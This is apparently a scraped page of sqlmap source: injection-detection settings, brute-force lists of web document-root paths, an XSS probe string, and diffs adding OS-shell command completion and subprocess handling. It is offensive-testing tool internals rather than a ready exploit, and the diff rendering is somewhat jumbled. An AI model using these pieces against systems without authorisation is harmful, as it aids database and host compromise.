 DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.ascii_letters)
 # Alphabet used for heuristic checks
 HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', ',', '.')
 # String used for dummy non-SQLi (e.g. XSS) heuristic checks of a tested parameter value
 DUMMY_NON_SQLI_CHECK_APPENDIX = "<'\">"
 # Regular expression used for recognition of file inclusion errors
 FI_ERROR_REGEX = "(?i)[^\n]*(no such file|failed (to )?open)[^\n]*"
 # Length of prefix and suffix used in non-SQLI heuristic checks
 NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6
 # Connection chunk size (processing large responses in chunks to avoid MemoryError crashes - e.g. large table dump in full UNION injections)
 MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024
 # Maximum response total page size (trimmed if larger)
 MAX_CONNECTION_TOTAL_SIZE = 100 * 1024 * 1024
 # Maximum (multi-threaded) length of entry in bisection algorithm
 MAX_BISECTION_LENGTH = 50 * 1024 * 1024
 # Mark used for trimming unnecessary content in large chunks
 LARGE_CHUNK_TRIM_MARKER = "__TRIMMED_CONTENT__"
 # Generic SQL comment formation
 GENERIC_SQL_COMMENT = "-- [RANDSTR]"
 # Threshold value for turning back on time auto-adjustment mechanism
 VALID_TIME_CHARS_RUN_THRESHOLD = 100
 # Check for empty columns only if table is sufficiently large
 CHECK_ZERO_COLUMNS_THRESHOLD = 10
 # Boldify all logger messages containing these "patterns"
 BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved")
 # Generic www root directory names
 GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")
 # Maximum length of a help part containing switch/option name(s)
 MAX_HELP_OPTION_LENGTH = 18
 # Maximum number of connection retries (to prevent problems with recursion)
 MAX_CONNECT_RETRIES = 100
 # Strings for detecting formatting errors
 FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Conversion failed", "String or binary data would be truncated", "Failed to convert", "unable to interpret text value", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal", "DataTypeMismatchException")
 # Regular expression used for extracting ASP.NET view state values
 VIEWSTATE_REGEX = r'(?i)(?P<name>__VIEWSTATE[^"]*)[^>]+value="(?P<result>[^"]+)'
 # Regular expression used for extracting ASP.NET event validation values
 EVENTVALIDATION_REGEX = r'(?i)(?P<name>__EVENTVALIDATION[^"]*)[^>]+value="(?P<result>[^"]+)'
 # Number of rows to generate inside the full union test for limited output (mustn't be too large to prevent payload length problems)
 LIMITED_ROWS_TEST_NUMBER = 15
 # Default adapter to use for bottle server
 RESTAPI_DEFAULT_ADAPTER = "wsgiref"
 # Default REST-JSON API server listen address
 RESTAPI_DEFAULT_ADDRESS = "127.0.0.1"
 # Default REST-JSON API server listen port
 RESTAPI_DEFAULT_PORT = 8775
 # Format used for representing invalid unicode characters
 INVALID_UNICODE_CHAR_FORMAT = r"\x%02x"
 # Regular expression for XML POST data
 XML_RECOGNITION_REGEX = r"(?s)\A\s*<[^>]+>(.+>)?\s*\Z"
 # Regular expression used for detecting JSON POST data
 JSON_RECOGNITION_REGEX = r'(?s)\A(\s*\[)*\s*\{.*"[^"]+"\s*:\s*("[^"]+"|\d+).*\}\s*(\]\s*)*\Z'
 # Regular expression used for detecting JSON-like POST data
 JSON_LIKE_RECOGNITION_REGEX = r"(?s)\A(\s*\[)*\s*\{.*'[^']+'\s*:\s*('[^']+'|\d+).*\}\s*(\]\s*)*\Z"
 # Regular expression used for detecting multipart POST data
 MULTIPART_RECOGNITION_REGEX = r"(?i)Content-Disposition:[^;]+;\s*name="
 # Regular expression used for detecting Array-like POST data
 ARRAY_LIKE_RECOGNITION_REGEX = r"(\A|%s)(\w+)\[\]=.+%s\2\[\]=" % (DEFAULT_GET_POST_DELIMITER, DEFAULT_GET_POST_DELIMITER)
 # Default POST data content-type
 DEFAULT_CONTENT_TYPE = "application/x-www-form-urlencoded; charset=utf-8"
 # Raw text POST data content-type
 PLAIN_TEXT_CONTENT_TYPE = "text/plain; charset=utf-8"
 # Length used while checking for existence of Suhosin-patch (like) protection mechanism
 SUHOSIN_MAX_VALUE_LENGTH = 512
 # Minimum size of an (binary) entry before it can be considered for dumping to disk
 MIN_BINARY_DISK_DUMP_SIZE = 100
 # Regular expression used for extracting form tags
 FORM_SEARCH_REGEX = r"(?si)<form(?!.+<form).+?</form>"
 # Maximum number of lines to save in history file
 MAX_HISTORY_LENGTH = 1000
 # Minimum field entry length needed for encoded content (hex, base64,...) check
 MIN_ENCODED_LEN_CHECK = 5
 # Timeout in seconds in which Metasploit remote session has to be initialized
 METASPLOIT_SESSION_TIMEOUT = 300
 # Reference: http://www.postgresql.org/docs/9.0/static/catalog-pg-largeobject.html
 LOBLKSIZE = 2048
 # Suffix used to mark variables having keyword names
 EVALCODE_KEYWORD_SUFFIX = "_KEYWORD"
 # Reference: http://www.cookiecentral.com/faq/#3.5
 NETSCAPE_FORMAT_HEADER_COOKIES = "# Netscape HTTP Cookie File."
 # Infixes used for automatic recognition of parameters carrying anti-CSRF tokens
 CSRF_TOKEN_PARAMETER_INFIXES = ("csrf", "xsrf")
 # Prefixes used in brute force search for web server document root
 BRUTE_DOC_ROOT_PREFIXES = {
    OS.LINUX: ("/var/www", "/usr/local/apache", "/usr/local/apache2", "/usr/local/www/apache22", "/usr/local/www/apache24", "/usr/local/httpd", "/var/www/nginx-default", "/srv/www", "/var/www/%TARGET%", "/var/www/vhosts/%TARGET%", "/var/www/virtual/%TARGET%", "/var/www/clients/vhosts/%TARGET%", "/var/www/clients/virtual/%TARGET%"),
    OS.WINDOWS: ("/xampp", "/Program Files/xampp", "/wamp", "/Program Files/wampp", "/apache", "/Program Files/Apache Group/Apache", "/Program Files/Apache Group/Apache2", "/Program Files/Apache Group/Apache2.2", "/Program Files/Apache Group/Apache2.4", "/Inetpub/wwwroot", "/Inetpub/wwwroot/%TARGET%", "/Inetpub/vhosts/%TARGET%")
 }
 # Suffixes used in brute force search for web server document root
 BRUTE_DOC_ROOT_SUFFIXES = ("", "html", "htdocs", "httpdocs", "php", "public", "src", "site", "build", "web", "www", "data", "sites/all", "www/build")
 # String used for marking target name inside used brute force web server document root
 BRUTE_DOC_ROOT_TARGET_MARK = "%TARGET%"
 # Character used as a boundary in kb.chars (preferably less frequent letter)
 KB_CHARS_BOUNDARY_CHAR = 'q'
 # Letters of lower frequency used in kb.chars
 KB_CHARS_LOW_FREQUENCY_ALPHABET = "zqxjkvbp"
 # CSS style used in HTML dump format
 HTML_DUMP_CSS_STYLE = """<style>
 table{
    margin:10;
    background-color:#FFFFFF;
    font-family:verdana;
    font-size:12px;
    align:center;
 }
 thead{
    font-weight:bold;
    background-color:#4F81BD;
    color:#FFFFFF;
 }
 tr:nth-child(even) {
    background-color: #D3DFEE
 }
 td{
    font-size:10px;
 }
 th{
    font-size:10px;
 }
 </style>"""
--- a/lib/core/shell.py
+++ b/lib/core/shell.py
@@ -1,68 +1,24 @@
 #!/usr/bin/env python
 """
-$Id$
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
-
+See the file 'doc/COPYING' for copying permission
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
                        and Daniele Bellucci <daniele.bellucci@gmail.com>
 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 Software Foundation version 2 of the License.
 sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
 WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
 FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
 details.
 You should have received a copy of the GNU General Public License along
 with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 import atexit
 import os
 import rlcompleter
 from lib.core import readlineng as readline
-from lib.core.data import kb
+from lib.core.data import logger
 from lib.core.data import paths
-from lib.core.data import queries
+from lib.core.enums import AUTOCOMPLETE_TYPE
 from lib.core.enums import OS
 from lib.core.settings import MAX_HISTORY_LENGTH
 try:
    import rlcompleter
-def saveHistory():
+    class CompleterNG(rlcompleter.Completer):
    historyPath = os.path.expanduser(paths.SQLMAP_HISTORY)
    readline.write_history_file(historyPath)
 def loadHistory():
    historyPath = os.path.expanduser(paths.SQLMAP_HISTORY)
    if os.path.exists(historyPath):
        readline.read_history_file(historyPath)
 def queriesForAutoCompletion():
    autoComplQueries = {}
    for _, query in queries[kb.dbms].items():
        if isinstance(query, str) and len(query) > 1:
            autoComplQuery = query
        elif isinstance(query, dict) and "inband" in query:
            autoComplQuery = query["inband"]["query"]
        else:
            continue
        autoComplQueries[autoComplQuery] = None
    return autoComplQueries
 class CompleterNG(rlcompleter.Completer):
        def global_matches(self, text):
            """
            Compute matches when text is a simple name.
@@ -73,33 +29,104 @@ class CompleterNG(rlcompleter.Completer):
            matches = []
            n = len(text)
-        for list in [ self.namespace ]:
+            for ns in (self.namespace,):
-            for word in list:
+                for word in ns:
                    if word[:n] == text:
                        matches.append(word)
            return matches
 except:
    readline._readline = None
 def readlineAvailable():
    """
    Check if the readline is available. By default
    it is not in Python default installation on Windows
    """
-def autoCompletion(sqlShell=False, osShell=False):
+    return readline._readline is not None
-    # First of all we check if the readline is available, by default
+
-    # it is not in Python default installation on Windows
+def clearHistory():
-    if not readline.haveReadline:
+    if not readlineAvailable():
        return
-    if sqlShell:
+    readline.clear_history()
-        completer = CompleterNG(queriesForAutoCompletion())
+
-    elif osShell:
+def saveHistory(completion=None):
-        # TODO: add more operating system commands; differentiate commands
+    if not readlineAvailable():
-        # based on future operating system fingerprint
+        return
    if completion == AUTOCOMPLETE_TYPE.SQL:
        historyPath = paths.SQL_SHELL_HISTORY
    elif completion == AUTOCOMPLETE_TYPE.OS:
        historyPath = paths.OS_SHELL_HISTORY
    else:
        historyPath = paths.SQLMAP_SHELL_HISTORY
    try:
        with open(historyPath, "w+"):
            pass
    except:
        pass
    readline.set_history_length(MAX_HISTORY_LENGTH)
    try:
        readline.write_history_file(historyPath)
    except IOError, msg:
        warnMsg = "there was a problem writing the history file '%s' (%s)" % (historyPath, msg)
        logger.warn(warnMsg)
 def loadHistory(completion=None):
    if not readlineAvailable():
        return
    clearHistory()
    if completion == AUTOCOMPLETE_TYPE.SQL:
        historyPath = paths.SQL_SHELL_HISTORY
    elif completion == AUTOCOMPLETE_TYPE.OS:
        historyPath = paths.OS_SHELL_HISTORY
    else:
        historyPath = paths.SQLMAP_SHELL_HISTORY
    if os.path.exists(historyPath):
        try:
            readline.read_history_file(historyPath)
        except IOError, msg:
            warnMsg = "there was a problem loading the history file '%s' (%s)" % (historyPath, msg)
            logger.warn(warnMsg)
 def autoCompletion(completion=None, os=None, commands=None):
    if not readlineAvailable():
        return
    if completion == AUTOCOMPLETE_TYPE.OS:
        if os == OS.WINDOWS:
            # Reference: http://en.wikipedia.org/wiki/List_of_DOS_commands
            completer = CompleterNG({
-                                  "id": None, "ifconfig": None, "ls": None,
+                                      "copy": None, "del": None, "dir": None,
-                                  "netstat -natu": None, "pwd": None,
+                                      "echo": None, "md": None, "mem": None,
-                                  "uname": None, "whoami": None,
+                                      "move": None, "net": None, "netstat -na": None,
                                      "ver": None, "xcopy": None, "whoami": None,
                                    })
        else:
            # Reference: http://en.wikipedia.org/wiki/List_of_Unix_commands
            completer = CompleterNG({
                                      "cp": None, "rm": None, "ls": None,
                                      "echo": None, "mkdir": None, "free": None,
                                      "mv": None, "ifconfig": None, "netstat -natu": None,
                                      "pwd": None, "uname": None, "id": None,
                                    })
        readline.set_completer(completer.complete)
        readline.parse_and_bind("tab: complete")
-    loadHistory()
+    elif commands:
-    atexit.register(saveHistory)
+        completer = CompleterNG(dict(((_, None) for _ in commands)))
        readline.set_completer_delims(' ')
        readline.set_completer(completer.complete)
        readline.parse_and_bind("tab: complete")
    loadHistory(completion)
    atexit.register(saveHistory, completion)
--- a/lib/core/subprocessng.py
+++ b/lib/core/subprocessng.py
@@ -0,0 +1,202 @@
 #!/usr/bin/env python
 """
 Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 import errno
 import os
 import subprocess
 import sys
 import time
 from lib.core.settings import IS_WIN
 if IS_WIN:
    try:
        from win32file import ReadFile, WriteFile
        from win32pipe import PeekNamedPipe
    except ImportError:
        pass
    import msvcrt
 else:
    import select
    import fcntl
    if (sys.hexversion >> 16) >= 0x202:
        FCNTL = fcntl
    else:
        import FCNTL
 def blockingReadFromFD(fd):
    # Quick twist around original Twisted function
    # Blocking read from a non-blocking file descriptor
    output = ""
    while True:
        try:
            output += os.read(fd, 8192)
        except (OSError, IOError), ioe:
            if ioe.args[0] in (errno.EAGAIN, errno.EINTR):
                # Uncomment the following line if the process seems to
                # take a huge amount of cpu time
                # time.sleep(0.01)
                continue
            else:
                raise
        break
    if not output:
        raise EOFError("fd %s has been closed." % fd)
    return output
 def blockingWriteToFD(fd, data):
    # Another quick twist
    while True:
        try:
            data_length = len(data)
            wrote_data = os.write(fd, data)
        except (OSError, IOError), io:
            if io.errno in (errno.EAGAIN, errno.EINTR):
                continue
            else:
                raise
        if wrote_data < data_length:
            blockingWriteToFD(fd, data[wrote_data:])
        break
 # the following code is taken from http://code.activestate.com/recipes/440554-module-to-allow-asynchronous-subprocess-use-on-win/
 class Popen(subprocess.Popen):
    def recv(self, maxsize=None):
        return self._recv('stdout', maxsize)
    def recv_err(self, maxsize=None):
        return self._recv('stderr', maxsize)
    def send_recv(self, input='', maxsize=None):
        return self.send(input), self.recv(maxsize), self.recv_err(maxsize)
    def get_conn_maxsize(self, which, maxsize):
        if maxsize is None:
            maxsize = 1024
        elif maxsize < 1:
            maxsize = 1
        return getattr(self, which), maxsize
    def _close(self, which):
        getattr(self, which).close()
        setattr(self, which, None)
    if subprocess.mswindows:
        def send(self, input):
            if not self.stdin:
                return None
            try:
                x = msvcrt.get_osfhandle(self.stdin.fileno())
                (errCode, written) = WriteFile(x, input)
            except ValueError:
                return self._close('stdin')
            except (subprocess.pywintypes.error, Exception), why:
                if why[0] in (109, errno.ESHUTDOWN):
                    return self._close('stdin')
                raise
            return written
        def _recv(self, which, maxsize):
            conn, maxsize = self.get_conn_maxsize(which, maxsize)
            if conn is None:
                return None
            try:
                x = msvcrt.get_osfhandle(conn.fileno())
                (read, nAvail, nMessage) = PeekNamedPipe(x, 0)
                if maxsize < nAvail:
                    nAvail = maxsize
                if nAvail > 0:
                    (errCode, read) = ReadFile(x, nAvail, None)
            except (ValueError, NameError):
                return self._close(which)
            except (subprocess.pywintypes.error, Exception), why:
                if why[0] in (109, errno.ESHUTDOWN):
                    return self._close(which)
                raise
            if self.universal_newlines:
                read = self._translate_newlines(read)
            return read
    else:
        def send(self, input):
            if not self.stdin:
                return None
            if not select.select([], [self.stdin], [], 0)[1]:
                return 0
            try:
                written = os.write(self.stdin.fileno(), input)
            except OSError, why:
                if why[0] == errno.EPIPE:  # broken pipe
                    return self._close('stdin')
                raise
            return written
        def _recv(self, which, maxsize):
            conn, maxsize = self.get_conn_maxsize(which, maxsize)
            if conn is None:
                return None
            flags = fcntl.fcntl(conn, fcntl.F_GETFL)
            if not conn.closed:
                fcntl.fcntl(conn, fcntl.F_SETFL, flags | os.O_NONBLOCK)
            try:
                if not select.select([conn], [], [], 0)[0]:
                    return ''
                r = conn.read(maxsize)
                if not r:
                    return self._close(which)
                if self.universal_newlines:
                    r = self._translate_newlines(r)
                return r
            finally:
                if not conn.closed:
                    fcntl.fcntl(conn, fcntl.F_SETFL, flags)
 def recv_some(p, t=.1, e=1, tr=5, stderr=0):
    if tr < 1:
        tr = 1
    x = time.time() + t
    y = []
    r = ''
    if stderr:
        pr = p.recv_err
    else:
        pr = p.recv
    while time.time() < x or r:
        r = pr()
        if r is None:
            break
        elif r:
            y.append(r)
        else:
            time.sleep(max((x - time.time()) / tr, 0))
    return ''.join(y)
 def send_all(p, data):
    if not data:
        return
    while len(data):
        sent = p.send(data)
        if not isinstance(sent, int):
            break
        data = buffer(data, sent)
--- a/Show More
+++ b/Show More